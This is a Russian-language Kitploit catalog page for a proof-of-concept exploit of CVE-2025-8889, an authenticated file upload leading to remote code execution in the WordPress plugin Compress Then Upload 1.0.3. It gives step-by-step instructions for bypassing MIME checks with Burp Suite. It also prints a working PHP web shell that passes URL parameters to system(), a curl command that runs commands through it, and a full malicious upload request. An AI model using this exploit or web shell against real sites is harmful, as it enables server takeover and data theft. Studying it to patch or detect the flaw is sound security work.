Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8889 — Доказательство концепции эксплуатации для CVE-2025-8889: произвольная загрузка файлов с последующим выполнением кода (RCE) в плагине WordPress Compress Then Upload версии 1.0.3. Включает пошаговое PoC с использованием Burp Suite для обхода проверки MIME и выполнения PHP-кода. | Kitploit
Инструменты/GitHubGitHub/siberkampus/cve-2025-8889
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsiberkampus/cve-2025-8889

CVE-2025-8889

Доказательство концепции эксплуатации для CVE-2025-8889: произвольная загрузка файлов с последующим выполнением кода (RCE) в плагине WordPress Compress Then Upload версии 1.0.3. Включает пошаговое PoC с использованием Burp Suite для обхода проверки MIME и выполнения PHP-кода.

Репозиторий
161 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название эксплойта: WordPress Compress Then Upload Plugin 1.0.3 — произвольная загрузка файлов, приводящая к RCE

Дата: 2025-07-23
Автор эксплойта: Muhammed Çelik
Домашняя страница вендора: https://wordpress.com/plugins/compress-then-upload
Ссылка на ПО: https://downloads.wordpress.org/plugin/compress-then-upload.latest-stable.zip
Версия: 1.0.3
Протестировано на: Debian, WordPress 6.8.1, Apache 2.4.62, PHP 8.2.28
CVE: CVE-2025-8889

Уязвимость

Плагин WordPress «Compress Then Upload Images» не выполняет надлежащую проверку расширений файлов и MIME-типов при загрузке изображений через свой интерфейс загрузки медиафайлов. Хотя клиентские проверки существуют, их можно обойти, перехватив и изменив запрос на загрузку.

Аутентифицированный пользователь с правами на загрузку медиафайлов (роль «Автор» или выше) может воспользоваться этим следующим образом:

  1. Сначала загрузить безобидный файл изображения
  2. Перехватить запрос на загрузку (например, через Burp Suite)
  3. Изменить расширение загружаемого файла и его содержимое, добавив вредоносный PHP-код
  4. Сохранить исходный заголовок MIME-типа (image/jpeg), чтобы обойти слабые проверки на стороне сервера
  5. В результате на сервере выполняется произвольный PHP-код (Remote Code Execution, RCE)

PoC

Шаг 1. Подготовьте обычный файл изображения
Создайте обычный файл изображения, например regular.jpg (любой корректный JPG-файл).

Шаг 2. Загрузите обычное изображение через панель администратора WordPress

  • Войдите в панель администратора WordPress под пользователем, имеющим как минимум права Автора.
  • Перейдите в раздел Media > Compress Then Upload Images (интерфейс загрузки плагина).
  • Загрузите regular.jpg обычным способом.

Шаг 3. Перехватите и измените запрос на загрузку с помощью Burp Suite

  • Пока выполняется загрузка, перехватите multipart HTTP-запрос в Burp Suite.
  • Измените запрос:
    • Замените filename="regular.jpg" → filename="evil.php"
    • Замените содержимое файла на PHP-код веб-шелла:
GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }


Примечание: GIF89a; имитирует корректный заголовок GIF, чтобы обойти слабые проверки изображений.
Оставьте Content-Type как image/jpeg.

Передайте изменённый запрос на сервер.

Шаг 4. Запустите загруженный веб-шелл

Если загрузка прошла успешно, PHP-файл будет сохранён в каталоге uploads, например:
http://target-site.com/wp-content/uploads/2025/07/evil.php

Доступ через браузер или curl:

curl "http://target-site.com/wp-content/uploads/2025/07/evil.php?cmd=id"

Пример вредоносного запроса на загрузку (Burp Suite)

POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
...
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>
?>
Скачать инструмент